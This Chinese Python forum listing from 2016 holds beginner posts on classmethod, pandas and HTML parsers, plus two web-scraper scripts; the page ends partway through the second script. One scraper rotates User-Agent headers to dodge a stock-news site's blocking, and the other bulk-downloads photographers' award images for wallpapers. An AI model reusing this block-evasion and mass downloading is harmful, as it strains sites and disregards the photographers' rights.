python

python @classmethod 的使用场合

李魔佛发表了文章 • 0 个评论 • 13854 次浏览 • 2016-08-07 11:01 • 来自相关话题

官方的说法：
classmethod(function)
中文说明：
classmethod是用来指定一个类的方法为类方法，没有此参数指定的类的方法为实例方法，使用方法如下：class C:
@classmethod
def f(cls, arg1, arg2, ...): ...

看后之后真是一头雾水。说的啥子东西呢？？？

自己到国外的论坛看其他的例子和解释，顿时就很明朗。下面自己用例子来说明。

看下面的定义的一个时间类：class Data_test(object):
day=0
month=0
year=0
def __init__(self,year=0,month=0,day=0):
self.day=day
self.month=month
self.year=year

def out_date(self):
print "year :"
print self.year
print "month :"
print self.month
print "day :"
print self.day

t=Data_test(2016,8,1)
t.out_date()

输出： year :
2016
month :
8
day :
1
符合期望。

如果用户输入的是 "2016-8-1" 这样的字符格式，那么就需要调用Date_test 类前做一下处理：string_date='2016-8-1'
year,month,day=map(int,string_date.split('-'))
s=Data_test(year,month,day)
先把‘2016-8-1’ 分解成 year，month，day 三个变量，然后转成int，再调用Date_test(year,month,day)函数。也很符合期望。

那我可不可以把这个字符串处理的函数放到 Date_test 类当中呢？

那么@classmethod 就开始出场了class Data_test2(object):
day=0
month=0
year=0
def __init__(self,year=0,month=0,day=0):
self.day=day
self.month=month
self.year=year

@classmethod
def get_date(cls,
string_date):
#这里第一个参数是cls，表示调用当前的类名
year,month,day=map(int,string_date.split('-'))
date1=cls(year,month,day)
#返回的是一个初始化后的类
return date1

def out_date(self):
print "year :"
print self.year
print "month :"
print self.month
print "day :"
print self.day
在Date_test类里面创建一个成员函数，前面用了@classmethod装饰。它的作用就是有点像静态类，比静态类不一样的就是它可以传进来一个当前类作为第一个参数。

那么如何调用呢？r=Data_test2.get_date("2016-8-6")
r.out_date()输出：year :
2016
month :
8
day :
1
这样子等于先调用get_date（）对字符串进行处理，然后才使用Data_test的构造函数初始化。

这样的好处就是你以后重构类的时候不必要修改构造函数，只需要额外添加你要处理的函数，然后使用装饰符 @classmethod 就可以了。

本文原创
转载请注明出处：http://30daydo.com/article/89
查看全部

官方的说法：
classmethod(function)
中文说明：
classmethod是用来指定一个类的方法为类方法，没有此参数指定的类的方法为实例方法，使用方法如下：

class C:

    @classmethod

    def f(cls, arg1, arg2, ...): ...

看后之后真是一头雾水。说的啥子东西呢？？？

自己到国外的论坛看其他的例子和解释，顿时就很明朗。下面自己用例子来说明。

看下面的定义的一个时间类：

class Data_test(object):

    day=0

    month=0

    year=0

    def __init__(self,year=0,month=0,day=0):

        self.day=day

        self.month=month

        self.year=year



    def out_date(self):

        print "year :"

        print self.year

        print "month :"

        print self.month

        print "day :"

        print self.day

t=Data_test(2016,8,1)

t.out_date()

输出：

year :

2016

month :

8

day :

1

符合期望。

如果用户输入的是 "2016-8-1" 这样的字符格式，那么就需要调用Date_test 类前做一下处理：

string_date='2016-8-1'

year,month,day=map(int,string_date.split('-'))

s=Data_test(year,month,day)

先把‘2016-8-1’ 分解成 year，month，day 三个变量，然后转成int，再调用Date_test(year,month,day)函数。也很符合期望。

那我可不可以把这个字符串处理的函数放到 Date_test 类当中呢？

那么@classmethod 就开始出场了

class Data_test2(object):

    day=0

    month=0

    year=0

    def __init__(self,year=0,month=0,day=0):

        self.day=day

        self.month=month

        self.year=year



    @classmethod

    def get_date(cls,

string_date):

        #这里第一个参数是cls， 表示调用当前的类名

        year,month,day=map(int,string_date.split('-'))

        date1=cls(year,month,day)

        #返回的是一个初始化后的类

        return date1



    def out_date(self):

        print "year :"

        print self.year

        print "month :"

        print self.month

        print "day :"

        print self.day

在Date_test类里面创建一个成员函数，前面用了@classmethod装饰。它的作用就是有点像静态类，比静态类不一样的就是它可以传进来一个当前类作为第一个参数。

那么如何调用呢？

r=Data_test2.get_date("2016-8-6")

r.out_date()

输出：

year :

2016

month :

8

day :

1

这样子等于先调用get_date（）对字符串进行处理，然后才使用Data_test的构造函数初始化。

这样的好处就是你以后重构类的时候不必要修改构造函数，只需要额外添加你要处理的函数，然后使用装饰符 @classmethod 就可以了。

本文原创
转载请注明出处：http://30daydo.com/article/89

怎么segmentfault上的问题都这么入门级别的？

李魔佛发表了文章 • 0 个评论 • 2777 次浏览 • 2016-07-28 16:37 • 来自相关话题

遇到一些问题，上去segmentfault上搜索答案，以为segmentfault是中文版的stackoverflow。结果大失所望。
基本都是一些菜鸟的问题。

搜索关键字： python
出来的是

结果都是怎么安装python，选择python2还是python3 这一类的问题。着实无语。
看来在中国肯义务分享技术的人并不像国外那么多，那么慷慨。
（也有可能大神们都在忙于做项目，没空帮助小白们吧）查看全部

遇到一些问题，上去segmentfault上搜索答案，以为segmentfault是中文版的stackoverflow。结果大失所望。
基本都是一些菜鸟的问题。

搜索关键字： python
出来的是

结果都是怎么安装python，选择python2还是python3 这一类的问题。着实无语。
看来在中国肯义务分享技术的人并不像国外那么多，那么慷慨。
（也有可能大神们都在忙于做项目，没空帮助小白们吧）

AttributeError: 'module' object has no attribute 'pyplot'

李魔佛回复了问题 • 1 人关注 • 1 个回复 • 10087 次浏览 • 2016-07-28 12:31 • 来自相关话题

ubuntu的pycharm中文注释显示乱码？

李魔佛回复了问题 • 1 人关注 • 1 个回复 • 11604 次浏览 • 2016-07-25 12:22 • 来自相关话题

python sqlite 插入的数据含有变量，结果不一致

李魔佛回复了问题 • 1 人关注 • 1 个回复 • 8700 次浏览 • 2016-07-18 07:50 • 来自相关话题

使用pandas的dataframe数据进行操作的总结

李魔佛发表了文章 • 0 个评论 • 6326 次浏览 • 2016-07-17 16:47 • 来自相关话题

t = df.iloc[0]<class 'pandas.core.series.Series'>

#使用iloc后，t已经变成了一个子集。已经不再是一个dataframe数据。所以你使用 t['high'] 返回的是一个值。此时t已经没有index了，如果这个时候调用 t.index

t=df[:1]
class 'pandas.core.frame.DataFrame'>

#这是返回的是一个DataFrame的一个子集。此时你可以继续用dateFrame的一些方法进行操作。

删除dataframe中某一行

df.drop()

df的内容如下：

df.drop(df[df[u'代码']==300141.0].index,inplace=True)
print df

输出如下

记得参数inplace=True，因为默认的值为inplace=False，意思就是你不添加的话就使用Falase这个值。
这样子原来的df不会被修改，只是会返回新的修改过的df。这样的话需要用一个新变量来承接它
new_df=df.drop(df[df[u'代码']==300141.0].index)

判断DataFrame为None
if df is None:
print "None len==0"
return False
查看全部

t = df.iloc[0]<class 'pandas.core.series.Series'>

#使用iloc后，t已经变成了一个子集。已经不再是一个dataframe数据。所以你使用 t['high'] 返回的是一个值。此时t已经没有index了，如果这个时候调用 t.index

t=df[:1]
class 'pandas.core.frame.DataFrame'>

#这是返回的是一个DataFrame的一个子集。此时你可以继续用dateFrame的一些方法进行操作。

删除dataframe中某一行

df.drop()

df的内容如下：

df.drop(df[df[u'代码']==300141.0].index,inplace=True)
print df

输出如下

记得参数inplace=True，因为默认的值为inplace=False，意思就是你不添加的话就使用Falase这个值。
这样子原来的df不会被修改，只是会返回新的修改过的df。这样的话需要用一个新变量来承接它
new_df=df.drop(df[df[u'代码']==300141.0].index)

判断DataFrame为None

    if df is None:

        print "None len==0"

        return False

pycharm 添加了中文注释后无法运行？

李魔佛回复了问题 • 1 人关注 • 1 个回复 • 7251 次浏览 • 2016-07-14 17:56 • 来自相关话题

python 爬虫下载的图片打不开？

李魔佛发表了文章 • 0 个评论 • 7597 次浏览 • 2016-07-09 17:33 • 来自相关话题

代码如下片段

__author__ = 'rocky'
import urllib,urllib2,StringIO,gzip
url="http://image.xitek.com/photo/2 ... ot%3B
filname=url.split("/")[-1]
req=urllib2.Request(url)
resp=urllib2.urlopen(req)
content=resp.read()
#data = StringIO.StringIO(content)
#gzipper = gzip.GzipFile(fileobj=data)
#html = gzipper.read()
f=open(filname,'w')
f.write()
f.close()

运行后生成的文件打开后不显示图片。

后来调试后发现，如果要保存为图片格式，文件的读写需要用'wb'，也就是上面代码中
f=open(filname,'w') 改一下改成

f=open(filname,'wb')

就可以了。
查看全部

代码如下片段

__author__ = 'rocky'

import urllib,urllib2,StringIO,gzip

url="http://image.xitek.com/photo/2 ... ot%3B

filname=url.split("/")[-1]

req=urllib2.Request(url)

resp=urllib2.urlopen(req)

content=resp.read()

#data = StringIO.StringIO(content)

#gzipper = gzip.GzipFile(fileobj=data)

#html = gzipper.read()

f=open(filname,'w')

f.write()

f.close()

运行后生成的文件打开后不显示图片。

后来调试后发现，如果要保存为图片格式，文件的读写需要用'wb'，也就是上面代码中
f=open(filname,'w') 改一下改成

f=open(filname,'wb')

就可以了。

判断网页内容是否经过gzip压缩 python代码

李魔佛发表了文章 • 0 个评论 • 4396 次浏览 • 2016-07-09 15:10 • 来自相关话题

同一个网页某些页面会通过gzip压缩网页内容，给正常的爬虫造成一定的错误干扰。

那么可以在代码中添加一个判断，判断网页内容是否经过gzip压缩，是的话多一个处理就可以了。

python 编写火车票抢票软件

李魔佛发表了文章 • 2 个评论 • 14674 次浏览 • 2016-06-30 15:55 • 来自相关话题

项目：python 编写火车票抢票软件
实现日期：2016.7.30

python 获取中国证券网的公告

python爬虫 • 李魔佛发表了文章 • 11 个评论 • 22130 次浏览 • 2016-06-30 15:45 • 来自相关话题

中国证券网： http://ggjd.cnstock.com/
这个网站的公告会比同花顺东方财富的早一点，而且还出现过早上中国证券网已经发了公告，而东财却拿去做午间公告，以至于可以提前获取公告提前埋伏。

现在程序自动把抓取的公告存入本网站中：http://30daydo.com/news.php
每天早上8:30更新一次。

生成的公告保存在stock/文件夹下，以日期命名。下面脚本是循坏检测，如果有新的公告就会继续生成。

默认保存前3页的公告。（一次过太多页会被网站暂时屏蔽几分钟）。代码以及使用了切换header来躲避网站的封杀。

修改
getInfo(3) 里面的数字就可以抓取前面某页数据

__author__ = 'rocchen'
# working v1.0
from bs4 import BeautifulSoup
import urllib2, datetime, time, codecs, cookielib, random, threading
import os,sys

def getInfo(max_index_user=5):
stock_news_site =
"http://ggjd.cnstock.com/gglist/search/ggkx/"

my_userAgent = [
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',
'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)']
index = 0
max_index = max_index_user
num = 1
temp_time = time.strftime("[%Y-%m-%d]-[%H-%M]", time.localtime())

store_filename = "StockNews-%s.log" % temp_time
fOpen = codecs.open(store_filename, 'w', 'utf-8')

while index < max_index:
user_agent = random.choice(my_userAgent)
# print user_agent
company_news_site = stock_news_site + str(index)
# content = urllib2.urlopen(company_news_site)
headers = {'User-Agent': user_agent, 'Host': "ggjd.cnstock.com", 'DNT': '1',
'Accept': 'text/html, application/xhtml+xml, */*', }
req = urllib2.Request(url=company_news_site, headers=headers)
resp = None
raw_content = ""
try:
resp = urllib2.urlopen(req, timeout=30)

except urllib2.HTTPError as e:
e.fp.read()
except urllib2.URLError as e:
if hasattr(e, 'code'):
print "error code %d" % e.code
elif hasattr(e, 'reason'):
print "error reason %s " % e.reason

finally:
if resp:
raw_content = resp.read()
time.sleep(2)
resp.close()

soup = BeautifulSoup(raw_content, "html.parser")
all_content = soup.find_all("span", "time")

for i in all_content:
news_time = i.string
node = i.next_sibling
str_temp = "No.%s \n%s\t%s\n---> %s \n\n" % (str(num), news_time, node['title'], node['href'])
#print "inside %d" %num
#print str_temp
fOpen.write(str_temp)
num = num + 1

#print "index %d" %index
index = index + 1

fOpen.close()

def execute_task(n=60):
period = int(n)
while True:
print datetime.datetime.now()
getInfo(3)

time.sleep(60 * period)

if __name__ == "__main__":

sub_folder = os.path.join(os.getcwd(), "stock")
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
os.chdir(sub_folder)
start_time = time.time() # user can change the max index number getInfo(10), by default is getInfo(5)
if len(sys.argv) <2:
n = raw_input("Input Period : ? mins to download every cycle")
else:
n=int(sys.argv[1])
execute_task(n)
end_time = time.time()
print "Total time: %s s." % str(round((end_time - start_time), 4))

github：https://github.com/Rockyzsu/cnstock
查看全部

中国证券网： http://ggjd.cnstock.com/
这个网站的公告会比同花顺东方财富的早一点，而且还出现过早上中国证券网已经发了公告，而东财却拿去做午间公告，以至于可以提前获取公告提前埋伏。

现在程序自动把抓取的公告存入本网站中：http://30daydo.com/news.php
每天早上8:30更新一次。

生成的公告保存在stock/文件夹下，以日期命名。下面脚本是循坏检测，如果有新的公告就会继续生成。

默认保存前3页的公告。（一次过太多页会被网站暂时屏蔽几分钟）。代码以及使用了切换header来躲避网站的封杀。

修改
getInfo(3) 里面的数字就可以抓取前面某页数据

__author__ = 'rocchen'

# working v1.0

from bs4 import BeautifulSoup

import urllib2, datetime, time, codecs, cookielib, random, threading

import os,sys





def getInfo(max_index_user=5):

    stock_news_site =

"http://ggjd.cnstock.com/gglist/search/ggkx/"

 

    my_userAgent = [

        'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',

        'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',

        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',

        'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',

        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',

        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',

        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',

        'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',

        'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',

        'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',

        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)',

        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',

        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)',

        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)']

    index = 0

    max_index = max_index_user

    num = 1

    temp_time = time.strftime("[%Y-%m-%d]-[%H-%M]", time.localtime())



    store_filename = "StockNews-%s.log" % temp_time

    fOpen = codecs.open(store_filename, 'w', 'utf-8')



    while index < max_index:

        user_agent = random.choice(my_userAgent)

        # print user_agent

        company_news_site = stock_news_site + str(index)

        # content = urllib2.urlopen(company_news_site)

        headers = {'User-Agent': user_agent, 'Host': "ggjd.cnstock.com", 'DNT': '1',

                   'Accept': 'text/html, application/xhtml+xml, */*', }

        req = urllib2.Request(url=company_news_site, headers=headers)

        resp = None

        raw_content = ""

        try:

            resp = urllib2.urlopen(req, timeout=30)



        except urllib2.HTTPError as e:

            e.fp.read()

        except urllib2.URLError as e:

            if hasattr(e, 'code'):

                print "error code %d" % e.code

            elif hasattr(e, 'reason'):

                print "error reason %s " % e.reason



        finally:

            if resp:

                raw_content = resp.read()

                time.sleep(2)

                resp.close()



        soup = BeautifulSoup(raw_content, "html.parser")

        all_content = soup.find_all("span", "time")



        for i in all_content:

            news_time = i.string

            node = i.next_sibling

            str_temp = "No.%s \n%s\t%s\n---> %s \n\n" % (str(num), news_time, node['title'], node['href'])

            #print "inside %d" %num

            #print str_temp

            fOpen.write(str_temp)

            num = num + 1



        #print "index %d" %index

        index = index + 1



    fOpen.close()





def execute_task(n=60):

    period = int(n)

    while True:

        print datetime.datetime.now()

        getInfo(3)

        

        time.sleep(60 * period)

        





if __name__ == "__main__":



    sub_folder = os.path.join(os.getcwd(), "stock")

    if not os.path.exists(sub_folder):

        os.mkdir(sub_folder)

    os.chdir(sub_folder)

    start_time = time.time()  # user can change the max index number getInfo(10), by default is getInfo(5)

    if len(sys.argv) <2:

        n = raw_input("Input Period : ? mins to download every cycle")

    else:

        n=int(sys.argv[1])

    execute_task(n)

    end_time = time.time()

    print "Total time: %s s." % str(round((end_time - start_time), 4))

github：https://github.com/Rockyzsu/cnstock

为什么beautifulsoup的children不能用列表索引index去返回值？

李魔佛回复了问题 • 1 人关注 • 1 个回复 • 7263 次浏览 • 2016-06-29 22:10 • 来自相关话题

python 下使用beautifulsoup还是lxml ？

李魔佛发表了文章 • 0 个评论 • 8043 次浏览 • 2016-06-29 18:29 • 来自相关话题

刚开始接触爬虫是从beautifulsoup开始的，觉得beautifulsoup很好用。然后后面又因为使用scrapy的缘故，接触到lxml。到底哪一个更加好用？

然后看了下beautifulsoup的源码，其实现原理使用的是正则表达式，而lxml使用的节点递归的技术。

Don't use BeautifulSoup, use lxml.soupparser then you're sitting on top of the power of lxml and can use the good bits of BeautifulSoup which is to deal with really broken and crappy HTML.

9down vote
In summary, lxml is positioned as a lightning-fast production-quality html and xml parser that, by the way, also includes a soupparser module to fall back on BeautifulSoup's functionality. BeautifulSoupis a one-person project, designed to save you time to quickly extract data out of poorly-formed html or xml.
lxml documentation says that both parsers have advantages and disadvantages. For this reason, lxml provides a soupparser so you can switch back and forth. Quoting,
[quote]
BeautifulSoup uses a different parsing approach. It is not a real HTML parser but uses regular expressions to dive through tag soup. It is therefore more forgiving in some cases and less good in others. It is not uncommon that lxml/libxml2 parses and fixes broken HTML better, but BeautifulSoup has superiour support for encoding detection. It very much depends on the input which parser works better.

In the end they are saying,

The downside of using this parser is that it is much slower than the HTML parser of lxml. So if performance matters, you might want to consider using soupparser only as a fallback for certain cases.

If I understand them correctly, it means that the soup parser is more robust --- it can deal with a "soup" of malformed tags by using regular expressions --- whereas lxml is more straightforward and just parses things and builds a tree as you would expect. I assume it also applies to BeautifulSoup itself, not just to the soupparser for lxml.
They also show how to benefit from BeautifulSoup's encoding detection, while still parsing quickly with lxml:[code]>>> from BeautifulSoup import UnicodeDammit

>>> def decode_html(html_string):
... converted = UnicodeDammit(html_string, isHTML=True)
... if not converted.unicode:
... raise UnicodeDecodeError(
... "Failed to detect encoding, tried [%s]",
... ', '.join(converted.triedEncodings))
... # print converted.originalEncoding
... return converted.unicode

>>> root = lxml.html.fromstring(decode_html(tag_soup))[/code]
(Same source: http://lxml.de/elementsoup.html).
In words of BeautifulSoup's creator,

That's it! Have fun! I wrote Beautiful Soup to save everybody time. Once you get used to it, you should be able to wrangle data out of poorly-designed websites in just a few minutes. Send me email if you have any comments, run into problems, or want me to know about your project that uses Beautiful Soup.[code] --Leonard[/code]

Quoted from the Beautiful Soup documentation.
I hope this is now clear. The soup is a brilliant one-person project designed to save you time to extract data out of poorly-designed websites. The goal is to save you time right now, to get the job done, not necessarily to save you time in the long term, and definitely not to optimize the performance of your software.
Also, from the lxml website,

lxml has been downloaded from the Python Package Index more than two million times and is also available directly in many package distributions, e.g. for Linux or MacOS-X.

And, from Why lxml?,

The C libraries libxml2 and libxslt have huge benefits:... Standards-compliant... Full-featured... fast. fast! FAST! ... lxml is a new Python binding for libxml2 and libxslt...

[/quote]
意思大概就是不要用Beautifulsoup，使用lxml， lxml才能让你提要到让你体会到html节点解析的速度之快。

查看全部

刚开始接触爬虫是从beautifulsoup开始的，觉得beautifulsoup很好用。然后后面又因为使用scrapy的缘故，接触到lxml。到底哪一个更加好用？

然后看了下beautifulsoup的源码，其实现原理使用的是正则表达式，而lxml使用的节点递归的技术。

Don't use BeautifulSoup, use lxml.soupparser then you're sitting on top of the power of lxml and can use the good bits of BeautifulSoup which is to deal with really broken and crappy HTML.

9down vote
In summary,
lxml
is positioned as a lightning-fast production-quality html and xml parser that, by the way, also includes a
soupparser
module to fall back on BeautifulSoup's functionality.
BeautifulSoup
is a one-person project, designed to save you time to quickly extract data out of poorly-formed html or xml.
lxml documentation says that both parsers have advantages and disadvantages. For this reason,
lxml
provides a
soupparser
so you can switch back and forth. Quoting,
[quote]
BeautifulSoup uses a different parsing approach. It is not a real HTML parser but uses regular expressions to dive through tag soup. It is therefore more forgiving in some cases and less good in others. It is not uncommon that lxml/libxml2 parses and fixes broken HTML better, but BeautifulSoup has superiour support for encoding detection. It very much depends on the input which parser works better.

In the end they are saying,

The downside of using this parser is that it is much slower than the HTML parser of lxml. So if performance matters, you might want to consider using soupparser only as a fallback for certain cases.

If I understand them correctly, it means that the soup parser is more robust --- it can deal with a "soup" of malformed tags by using regular expressions --- whereas

lxml

is more straightforward and just parses things and builds a tree as you would expect. I assume it also applies to

BeautifulSoup

itself, not just to the

soupparser

for

lxml

.
They also show how to benefit from

BeautifulSoup

's encoding detection, while still parsing quickly with

lxml

:

[code]>>> from BeautifulSoup import UnicodeDammit



>>> def decode_html(html_string):

...     converted = UnicodeDammit(html_string, isHTML=True)

...     if not converted.unicode:

...         raise UnicodeDecodeError(

...             "Failed to detect encoding, tried [%s]",

...             ', '.join(converted.triedEncodings))

...     # print converted.originalEncoding

...     return converted.unicode



>>> root = lxml.html.fromstring(decode_html(tag_soup))

[/code]
(Same source: http://lxml.de/elementsoup.html).
In words of

BeautifulSoup

's creator,

That's it! Have fun! I wrote Beautiful Soup to save everybody time. Once you get used to it, you should be able to wrangle data out of poorly-designed websites in just a few minutes. Send me email if you have any comments, run into problems, or want me to know about your project that uses Beautiful Soup.
[code] --Leonard
[/code]

Quoted from the Beautiful Soup documentation.
I hope this is now clear. The soup is a brilliant one-person project designed to save you time to extract data out of poorly-designed websites. The goal is to save you time right now, to get the job done, not necessarily to save you time in the long term, and definitely not to optimize the performance of your software.
Also, from the lxml website,

lxml has been downloaded from the Python Package Index more than two million times and is also available directly in many package distributions, e.g. for Linux or MacOS-X.

And, from Why lxml?,

The C libraries libxml2 and libxslt have huge benefits:... Standards-compliant... Full-featured... fast. fast! FAST! ... lxml is a new Python binding for libxml2 and libxslt...

[/quote]
意思大概就是不要用Beautifulsoup，使用lxml， lxml才能让你提要到让你体会到html节点解析的速度之快。

python 批量获取色影无忌获奖图片

python爬虫 • 李魔佛发表了文章 • 6 个评论 • 17119 次浏览 • 2016-06-29 16:41 • 来自相关话题

色影无忌上的图片很多都可以直接拿来做壁纸的，而且发布面不会太广，基本不会和市面上大部分的壁纸或者图片素材重复。关键还没有水印。这么良心的图片服务商哪里找呀~~

不多说，直接来代码：#-*-coding=utf-8-*-
__author__ = 'rocky chen'
from bs4 import BeautifulSoup
import urllib2,sys,StringIO,gzip,time,random,re,urllib,os
reload(sys)
sys.setdefaultencoding('utf-8')
class Xitek():
def __init__(self):
self.url="http://photo.xitek.com/"
user_agent="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
self.headers={"User-Agent":user_agent}
self.last_page=self.__get_last_page()

def __get_last_page(self):
html=self.__getContentAuto(self.url)
bs=BeautifulSoup(html,"html.parser")
page=bs.find_all('a',class_="blast")
last_page=page[0]['href'].split('/')[-1]
return int(last_page)

def __getContentAuto(self,url):
req=urllib2.Request(url,headers=self.headers)
resp=urllib2.urlopen(req)
#time.sleep(2*random.random())
content=resp.read()
info=resp.info().get("Content-Encoding")
if info==None:
return content
else:
t=StringIO.StringIO(content)
gziper=gzip.GzipFile(fileobj=t)
html = gziper.read()
return html

#def __getFileName(self,stream):

def __download(self,url):
p=re.compile(r'href="(/photoid/\d+)"')
#html=self.__getContentNoZip(url)

html=self.__getContentAuto(url)

content = p.findall(html)
for i in content:
print i

photoid=self.__getContentAuto(self.url+i)
bs=BeautifulSoup(photoid,"html.parser")
final_link=bs.find('img',class_="mimg")['src']
print final_link
#pic_stream=self.__getContentAuto(final_link)
title=bs.title.string.strip()
filename = re.sub('[\/:*?"<>|]', '-', title)
filename=filename+'.jpg'
urllib.urlretrieve(final_link,filename)
#f=open(filename,'w')
#f.write(pic_stream)
#f.close()
#print html
#bs=BeautifulSoup(html,"html.parser")
#content=bs.find_all(p)
#for i in content:
# print i
'''
print bs.title
element_link=bs.find_all('div',class_="element")
print len(element_link)
k=1
for href in element_link:

#print type(href)
#print href.tag
'''
'''
if href.children[0]:
print href.children[0]
'''
'''
t=0

for i in href.children:
#if i.a:
if t==0:
#print k
if i['href']
print link

if p.findall(link):
full_path=self.url[0:len(self.url)-1]+link
sub_html=self.__getContent(full_path)
bs=BeautifulSoup(sub_html,"html.parser")
final_link=bs.find('img',class_="mimg")['src']
#time.sleep(2*random.random())
print final_link
#k=k+1
#print type(i)
#print i.tag
#if hasattr(i,"href"):
#print i['href']
#print i.tag
t=t+1
#print "*"

'''

'''
if href:
if href.children:
print href.children[0]
'''
#print "one element link"

def getPhoto(self):

start=0
#use style/0
photo_url="http://photo.xitek.com/style/0/p/"
for i in range(start,self.last_page+1):
url=photo_url+str(i)
print url
#time.sleep(1)
self.__download(url)

'''
url="http://photo.xitek.com/style/0/p/10"
self.__download(url)
'''
#url="http://photo.xitek.com/style/0/p/0"
#html=self.__getContent(url)
#url="http://photo.xitek.com/"
#html=self.__getContentNoZip(url)
#print html
#'''
def main():
sub_folder = os.path.join(os.getcwd(), "content")
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
os.chdir(sub_folder)
obj=Xitek()
obj.getPhoto()

if __name__=="__main__":
main()

下载后在content文件夹下会自动抓取所有图片。（色影无忌的服务器没有做任何的屏蔽处理，所以脚本不能跑那么快，可以适当调用sleep函数，不要让服务器压力那么大）

已经下载好的图片：

github: https://github.com/Rockyzsu/fetchXitek (欢迎前来star) 查看全部

色影无忌上的图片很多都可以直接拿来做壁纸的，而且发布面不会太广，基本不会和市面上大部分的壁纸或者图片素材重复。关键还没有水印。这么良心的图片服务商哪里找呀~~

不多说，直接来代码：

#-*-coding=utf-8-*-

__author__ = 'rocky chen'

from bs4 import BeautifulSoup

import urllib2,sys,StringIO,gzip,time,random,re,urllib,os

reload(sys)

sys.setdefaultencoding('utf-8')

class Xitek():

    def __init__(self):

        self.url="http://photo.xitek.com/"

        user_agent="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

        self.headers={"User-Agent":user_agent}

        self.last_page=self.__get_last_page()





    def __get_last_page(self):

        html=self.__getContentAuto(self.url)

        bs=BeautifulSoup(html,"html.parser")

        page=bs.find_all('a',class_="blast")

        last_page=page[0]['href'].split('/')[-1]

        return int(last_page)





    def __getContentAuto(self,url):

        req=urllib2.Request(url,headers=self.headers)

        resp=urllib2.urlopen(req)

        #time.sleep(2*random.random())

        content=resp.read()

        info=resp.info().get("Content-Encoding")

        if info==None:

            return content

        else:

            t=StringIO.StringIO(content)

            gziper=gzip.GzipFile(fileobj=t)

            html = gziper.read()

            return html



    #def __getFileName(self,stream):





    def __download(self,url):

        p=re.compile(r'href="(/photoid/\d+)"')

        #html=self.__getContentNoZip(url)



        html=self.__getContentAuto(url)



        content = p.findall(html)

        for i in content:

            print i



            photoid=self.__getContentAuto(self.url+i)

            bs=BeautifulSoup(photoid,"html.parser")

            final_link=bs.find('img',class_="mimg")['src']

            print final_link

            #pic_stream=self.__getContentAuto(final_link)

            title=bs.title.string.strip()

            filename = re.sub('[\/:*?"<>|]', '-', title)

            filename=filename+'.jpg'

            urllib.urlretrieve(final_link,filename)

            #f=open(filename,'w')

            #f.write(pic_stream)

            #f.close()

        #print html

        #bs=BeautifulSoup(html,"html.parser")

        #content=bs.find_all(p)

        #for i in content:

        #    print i

        '''

        print bs.title

        element_link=bs.find_all('div',class_="element")

        print len(element_link)

        k=1

        for href in element_link:



            #print type(href)

            #print href.tag

        '''

        '''

            if href.children[0]:

                print href.children[0]

        '''

        '''

            t=0



            for i in href.children:

                #if i.a:

                if t==0:

                    #print k

                    if i['href']

                    print link



                        if p.findall(link):

                            full_path=self.url[0:len(self.url)-1]+link

                            sub_html=self.__getContent(full_path)

                            bs=BeautifulSoup(sub_html,"html.parser")

                            final_link=bs.find('img',class_="mimg")['src']

                            #time.sleep(2*random.random())

                            print final_link

                    #k=k+1

                #print type(i)

                #print i.tag

                #if hasattr(i,"href"):

                    #print i['href']

                #print i.tag

                t=t+1

                #print "*"



        '''



        '''

            if href:

                if href.children:

                    print href.children[0]

        '''

            #print "one element link"







    def getPhoto(self):



        start=0

        #use style/0

        photo_url="http://photo.xitek.com/style/0/p/"

        for i in range(start,self.last_page+1):

            url=photo_url+str(i)

            print url

            #time.sleep(1)

